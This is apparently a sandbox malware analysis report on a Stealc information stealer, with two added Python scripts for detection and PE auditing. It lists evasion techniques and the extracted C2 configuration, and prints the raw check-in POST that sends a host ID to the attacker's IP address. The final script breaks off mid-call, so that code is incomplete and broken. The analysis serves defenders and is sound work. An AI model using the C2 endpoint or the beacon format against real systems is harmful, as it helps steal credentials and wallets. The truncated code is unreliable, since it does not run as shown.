
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1526104
MD5: 5e8286d88eeff93b753e7454a6b431fd
SHA1: 9cd9b91b5dd298a811d922714c506581e7c27b96
SHA256: 9c62b127d6790b9b7957057a75441bc1a4e5eaf4f5c6c2669e833154739adb00
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 2228 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 5E8286D88EEFF93B753E7454A6B431FD)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development builds on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads seven legitimate third-party DLLs to collect sensitive data from web browsers: sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs: none
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Extracted malware configuration:
{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Yara matches

Source | Rule | Description | Author
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security
00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.2120585250.00000000008BE000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000003.2079880306.0000000004C10000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
Process Memory Space: file.exe PID: 2228 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: file.exe PID: 2228 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
0.2.file.exe.d30000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security

No Sigma rule has matched

Suricata alerts

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-04T18:56:06.423122+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49704 | 185.215.113.37 | 80 | TCP

AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.37/ | URL Reputation: Label: malware
Source: http://185.215.113.37 | URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php | URL Reputation: Label: malware
Source: 0.2.file.exe.d30000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D3C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D39AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D37240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D39B60 CryptUnprotectData,LocalAlloc,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D48EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D438B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D44910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D3DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D3E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D44570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D3ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D316D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D3F68A FindFirstFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D3F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D43EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D3BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D3DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose

Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.37:80
Source: Malware configuration extractor | URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Host: 185.215.113.37
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    POST /e2b1563c6670f193.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----DHDAFBFCFHIDAKFIIEBA
    Host: 185.215.113.37
    Content-Length: 211
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Raw: 2d 2d 2d 2d 2d 2d 44 48 44 41 46 42 46 43 46 48 49 44 41 4b 46 49 49 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 32 44 45 44 30 38 33 45 39 35 30 33 30 31 32 33 34 33 35 37 36 0d 0a 2d 2d 2d 2d 2d 2d 44 48 44 41 46 42 46 43 46 48 49 44 41 4b 46 49 49 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 44 48 44 41 46 42 46 43 46 48 49 44 41 4b 46 49 49 45 42 41 2d 2d 0d 0a
    Data Ascii:
    ------DHDAFBFCFHIDAKFIIEBA
    Content-Disposition: form-data; name="hwid"

    22DED083E9503012343576
    ------DHDAFBFCFHIDAKFIIEBA
    Content-Disposition: form-data; name="build"

    doma
    ------DHDAFBFCFHIDAKFIIEBA--
Source: Joe Sandbox View | IP Address: 185.215.113.37
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37 (reported 7 times)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D34880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle
Source: file.exe, 00000000.00000002.2120585250.00000000008BE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.2120585250.0000000000918000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.2120585250.0000000000902000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/C
Source: file.exe, 00000000.00000002.2120585250.0000000000918000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.2120585250.0000000000918000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpB
Source: file.exe, 00000000.00000002.2120585250.0000000000934000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpF
Source: file.exe, 00000000.00000002.2120585250.0000000000918000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpo
Source: file.exe, 00000000.00000002.2120585250.0000000000918000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpr
Source: file.exe, 00000000.00000002.2120585250.0000000000918000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php~
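The check-in POST above is the one artefact of this run that a network defender can key on directly. The following parser is an added example, not code from the report or from Joe Sandbox: it rebuilds the request from the header lines and the hex dump shown above (constructed input), extracts the multipart fields, and scores the traits visible in this capture (multipart POST to a .php path on a bare IP, no User-Agent, exactly the form fields hwid and build). The `is_stealc_checkin()` heuristic is the editor's own and is not the logic of the ET/SEKOIA Suricata rule 2044243 that fired.

```python
"""Parse the Stealc C2 check-in captured in the report and pull out the
fields a detection would key on. Added example; the request bytes are
reconstructed from the report's header lines and "Data Raw" hex dump."""
import re

# Body rebuilt byte-for-byte from the hex dump (constructed input); the
# Content-Length header in the capture says 211, which the test re-checks.
CHECKIN_BODY = (
    b"------DHDAFBFCFHIDAKFIIEBA\r\n"
    b'Content-Disposition: form-data; name="hwid"\r\n\r\n'
    b"22DED083E9503012343576\r\n"
    b"------DHDAFBFCFHIDAKFIIEBA\r\n"
    b'Content-Disposition: form-data; name="build"\r\n\r\n'
    b"doma\r\n"
    b"------DHDAFBFCFHIDAKFIIEBA--\r\n"
)
CHECKIN_REQUEST = (
    b"POST /e2b1563c6670f193.php HTTP/1.1\r\n"
    b"Content-Type: multipart/form-data; boundary=----DHDAFBFCFHIDAKFIIEBA\r\n"
    b"Host: 185.215.113.37\r\n"
    b"Content-Length: 211\r\n"
    b"Connection: Keep-Alive\r\n"
    b"Cache-Control: no-cache\r\n"
    b"\r\n"
) + CHECKIN_BODY


def parse_http_request(raw: bytes):
    """Split a raw HTTP/1.1 request into (method, path, headers, body).
    Header names are lower-cased; the body is everything after the blank line."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    method, path, _version = lines[0].decode("ascii").split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.decode("latin-1").partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def parse_multipart(body: bytes, boundary: str) -> dict:
    """Return {field name: value} for a multipart/form-data body.
    Parts are framed by "--" + boundary; the closing delimiter ends in "--"."""
    delimiter = b"--" + boundary.encode("ascii")
    fields = {}
    for part in body.split(delimiter):
        part = part.strip(b"\r\n")
        if not part or part == b"--":          # preamble or closing delimiter
            continue
        part_head, _, part_body = part.partition(b"\r\n\r\n")
        match = re.search(rb'name="([^"]*)"', part_head)
        if match:
            fields[match.group(1).decode("ascii")] = part_body.decode("latin-1")
    return fields


def checkin_indicators(raw: bytes) -> dict:
    """Traits of the check-in as seen in this report, each as a boolean,
    plus the parsed form fields themselves."""
    method, path, headers, body = parse_http_request(raw)
    ctype = headers.get("content-type", "")
    bmatch = re.search(r"boundary=([^;\s]+)", ctype)
    fields = parse_multipart(body, bmatch.group(1)) if bmatch else {}
    return {
        "multipart_post": method == "POST" and ctype.startswith("multipart/form-data"),
        "php_endpoint": path.endswith(".php"),
        "bare_ip_host": re.fullmatch(r"\d{1,3}(\.\d{1,3}){3}", headers.get("host", "")) is not None,
        "no_user_agent": "user-agent" not in headers,          # "HTTP GET or POST without a user agent"
        "checkin_fields": set(fields) == {"hwid", "build"},    # first beacon: hardware id + build tag
        "length_matches": headers.get("content-length") == str(len(body)),
        "fields": fields,
    }


def is_stealc_checkin(raw: bytes) -> bool:
    """Editor's heuristic (assumption, not the ET rule): all traits must hold."""
    return all(v for k, v in checkin_indicators(raw).items() if k != "fields")
```

The `build` value ("doma") is the same string the configuration extractor reported as "Botnet", so the form field and the extracted config corroborate each other; the `hwid` value is what the operator's panel uses to tell victims apart, and is the value to pivot on when hunting for the same host in other captures.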

System Summary

Source: file.exe | Static PE information: section name: (empty or non-printable)
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (empty or non-printable)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010F4156
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0110916B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010FD9EE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0105B1E0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0118400A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01102841
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010F0369
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010FFB89
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010FA3A3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01105BCC
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0101571F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01107E1D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010DFE83
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 00D345C0 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: uygwklsw ZLIB complexity 0.9949165076335877
Source: file.exe, 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2079880306.0000000004C10000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D48680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D43720 CoCreateInstance,MultiByteToWideChar,lstrcpyn
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\SXNZZ16P.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Sections loaded (in order): apphelp.dll, winmm.dll, sspicli.dll, wininet.dll, rstrtmgr.dll, ncrypt.dll, ntasn1.dll, iertutil.dll, windows.storage.dll, wldp.dll, profapi.dll, kernel.appcore.dll, ondemandconnroutehelper.dll, winhttp.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, urlmon.dll, srvcli.dll, netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe | Static file information: File size 1833472 > 1048576
Source: file.exe | Static PE information: Raw size of uygwklsw is bigger than: 0x100000 < 0x199600

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file (section rights in memory vs. on disk): 0.2.file.exe.d30000.0.unpack :EW;.rsrc :W;.idata :W; :EW;uygwklsw:EW;sowhbkpg:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;uygwklsw:EW;sowhbkpg:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D49860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1c2907 should be: 0x1cb203
Source: file.exe | Static PE information: section names (in order): (empty or non-printable), .rsrc, .idata, (empty or non-printable), uygwklsw, sowhbkpg, .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0119C911 push 70CE36DEh; mov dword ptr [esp], eax (at 0_2_0119C934)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011CA104 push 2BE62F23h; mov dword ptr [esp], eax (at 0_2_011CA110)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011B4105 push 282133F6h; mov dword ptr [esp], eax (at 0_2_011B41C2)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FE40DD push ecx; mov dword ptr [esp], edi (at 0_2_00FE40F1)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FE40DD push 617CF6B3h; mov dword ptr [esp], ecx (at 0_2_00FE4197)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FE40DD push 036D77C9h; mov dword ptr [esp], esi (at 0_2_00FE4245)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FE40DD push ebp; mov dword ptr [esp], edi (at 0_2_00FE4270)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FE40DD push eax; mov dword ptr [esp], 62EAE6C1h (at 0_2_00FE4274)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0118892E push ecx; mov dword ptr [esp], edx (at 0_2_011889A5)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010F4156 push eax; mov dword ptr [esp], esi (at 0_2_010F420B)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010F4156 push 6A10B396h; mov dword ptr [esp], eax (at 0_2_010F4213)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010F4156 push 3480CEFDh; mov dword ptr [esp], edx (at 0_2_010F42A6)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010F4156 push eax; mov dword ptr [esp], edi (at 0_2_010F43D4)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010F4156 push eax; mov dword ptr [esp], ebp (at 0_2_010F4404)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010F4156 push ecx; mov dword ptr [esp], 0681DBFAh (at 0_2_010F4535)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010F4156 push 60DA73E7h; mov dword ptr [esp], esi (at 0_2_010F4572)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010F4156 push 5D28279Ah; mov dword ptr [esp], edx (at 0_2_010F45BE)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010F4156 push 777B1058h; mov dword ptr [esp], ecx (at 0_2_010F46B5)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010F4156 push ebx; mov dword ptr [esp], edx (at 0_2_010F475B)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010F4156 push 786BCF45h; mov dword ptr [esp], ecx (at 0_2_010F47D2)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010F4156 push 5D51634Dh; mov dword ptr [esp], ecx (at 0_2_010F47DF)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010F4156 push 2C5CF9E2h; mov dword ptr [esp], eax (at 0_2_010F47EF)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010F4156 push 1C1DCC99h; mov dword ptr [esp], ebx (at 0_2_010F4801)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010F4156 push eax; mov dword ptr [esp], edi (at 0_2_010F485A)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010F4156 push esi; mov dword ptr [esp], ebx (at 0_2_010F485F)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010F4156 push ebx; mov dword ptr [esp], esi (at 0_2_010F4884)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010F4156 push 6A392154h; mov dword ptr [esp], edx (at 0_2_010F4894)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010F4156 push 62AED822h; mov dword ptr [esp], eax (at 0_2_010F4967)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010F4156 push 584B5B43h; mov dword ptr [esp], esp (at 0_2_010F499C)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010F4156 push ebp; mov dword ptr [esp], edx (at 0_2_010F4A29)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010F4156 push 5C5F3346h; mov dword ptr [esp], esi (at 0_2_010F4A39)
Source: file.exe | Static PE information: section name: uygwklsw entropy: 7.954033280427647
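Four of the static findings in this section (stored CheckSum that does not match the computed one, entry point in the non-standard `.taggant` section, section names that are blank or random, and a section with entropy near 8.0) can be re-derived from the file bytes alone. The script below is an added example, not code from the report or from Joe Sandbox, and uses only the Python standard library. Because the sample itself cannot be embedded here, it builds a minimal PE32 image in memory with a section layout modelled on the report (constructed input) and audits that; `audit_pe()` works unchanged on real file bytes. The CheckSum routine is the documented imagehlp algorithm (16-bit end-around-carry sum over the file, skipping the CheckSum field, plus the file length); `STANDARD_SECTIONS` is the editor's own list of common compiler section names, not a Joe Sandbox setting.

```python
"""Re-derive the report's static PE checks on a constructed PE32 image.
Added example; parse_pe()/audit_pe() accept any PE as bytes."""
import math
import struct

# Editor's list of section names a normal toolchain emits (assumption).
STANDARD_SECTIONS = {".text", ".data", ".rdata", ".bss", ".idata", ".edata",
                     ".rsrc", ".reloc", ".tls", ".pdata", ".debug"}


def pe_checksum(data: bytes, checksum_off: int) -> int:
    """PE CheckSum as imagehlp computes it: 16-bit words summed with end-around
    carry, the CheckSum dword itself skipped, then the file length added."""
    total = 0
    for off in range(0, len(data) - len(data) % 2, 2):
        if off in (checksum_off, checksum_off + 2):
            continue
        total += struct.unpack_from("<H", data, off)[0]
        total = (total & 0xFFFF) + (total >> 16)
    if len(data) % 2:
        total += data[-1]
    total = (total & 0xFFFF) + (total >> 16)
    total = (total + (total >> 16)) & 0xFFFF
    return total + len(data)


def shannon_entropy(buf: bytes) -> float:
    """Bits per byte: 0.0 for constant data, 8.0 for uniformly distributed bytes."""
    if not buf:
        return 0.0
    counts = [0] * 256
    for b in buf:
        counts[b] += 1
    return -sum(c / len(buf) * math.log2(c / len(buf)) for c in counts if c)


def parse_pe(data: bytes) -> dict:
    """Minimal header walk: entry RVA, CheckSum offset and value, section table."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20                      # optional header; CheckSum at +64 for PE32 and PE32+
    sections = []
    for i in range(num_sections):        # IMAGE_SECTION_HEADER is 40 bytes
        name, vsize, vaddr, raw_size, raw_ptr = struct.unpack_from("<8sIIII", data, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("latin-1"), "vaddr": vaddr,
                         "vsize": vsize, "raw": data[raw_ptr:raw_ptr + raw_size]})
    return {"entry_rva": struct.unpack_from("<I", data, opt + 16)[0], "checksum_off": opt + 64,
            "stored_checksum": struct.unpack_from("<I", data, opt + 64)[0], "sections": sections}


def audit_pe(data: bytes) -> dict:
    """The four static observations from the report, for any PE given as bytes."""
    pe = parse_pe(data)
    entry = pe["entry_rva"]
    entry_section = next((s["name"] for s in pe["sections"]
                          if s["vaddr"] <= entry < s["vaddr"] + max(s["vsize"], len(s["raw"]))), None)
    computed = pe_checksum(data, pe["checksum_off"])
    return {"stored_checksum": pe["stored_checksum"], "computed_checksum": computed,
            "checksum_valid": pe["stored_checksum"] == computed,
            "nonstandard_sections": [s["name"] for s in pe["sections"] if s["name"] not in STANDARD_SECTIONS],
            "entry_section": entry_section, "entry_outside_standard": entry_section not in STANDARD_SECTIONS,
            "section_entropy": {s["name"]: round(shannon_entropy(s["raw"]), 3) for s in pe["sections"]}}


def fix_checksum(data: bytes) -> bytes:
    """Write the correct CheckSum into the header, as a linker would (packers often do not)."""
    pe = parse_pe(data)
    out = bytearray(data)
    struct.pack_into("<I", out, pe["checksum_off"], pe_checksum(data, pe["checksum_off"]))
    return bytes(out)


def build_test_pe(sections, entry_rva: int) -> bytes:
    """Constructed test input: minimal PE32 with the given (name, raw bytes) sections,
    one section per 0x1000 page, CheckSum left at 0."""
    file_align, sect_align = 0x200, 0x1000
    align = lambda x, a: (x + a - 1) // a * a
    n = len(sections)
    headers_len = align(0x40 + 4 + 20 + 224 + 40 * n, file_align)
    size_of_image = sect_align * n + align(len(sections[-1][1]), sect_align)
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                          # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, n, 0, 0, 0, 224, 0x0102)   # i386, 224-byte PE32 optional header
    opt = struct.pack("<HBB9I6H4I2H6I", 0x10B, 14, 0,
                      0, 0, 0, entry_rva, sect_align, 0, 0x400000, sect_align, file_align,
                      6, 0, 0, 0, 6, 0, 0, size_of_image, headers_len, 0,    # last 0 is CheckSum
                      2, 0, 0x100000, 0x1000, 0x100000, 0x1000, 0, 16) + b"\0" * 128
    table, body, raw_ptr = b"", b"", headers_len
    for i, (name, raw) in enumerate(sections):
        raw_size = align(len(raw), file_align)
        table += struct.pack("<8sIIIIIIHHI", name.encode("ascii").ljust(8, b"\0"), len(raw),
                             sect_align * (i + 1), raw_size, raw_ptr, 0, 0, 0, 0, 0x60000020)
        body += raw.ljust(raw_size, b"\0")
        raw_ptr += raw_size
    return (bytes(dos) + b"PE\0\0" + coff + opt + table).ljust(headers_len, b"\0") + body


# Layout modelled on the report: an unnamed section, two standard ones, a packed
# high-entropy section and a .taggant stub that holds the entry point.
SAMPLE_PE = build_test_pe(
    [("", b"\0" * 0x200), (".rsrc", b"\0" * 0x200), (".idata", b"\0" * 0x200),
     ("uygwklsw", bytes(range(256)) * 16),    # uniform bytes stand in for packed data: entropy 8.0
     (".taggant", b"\xCC" * 0x100)],
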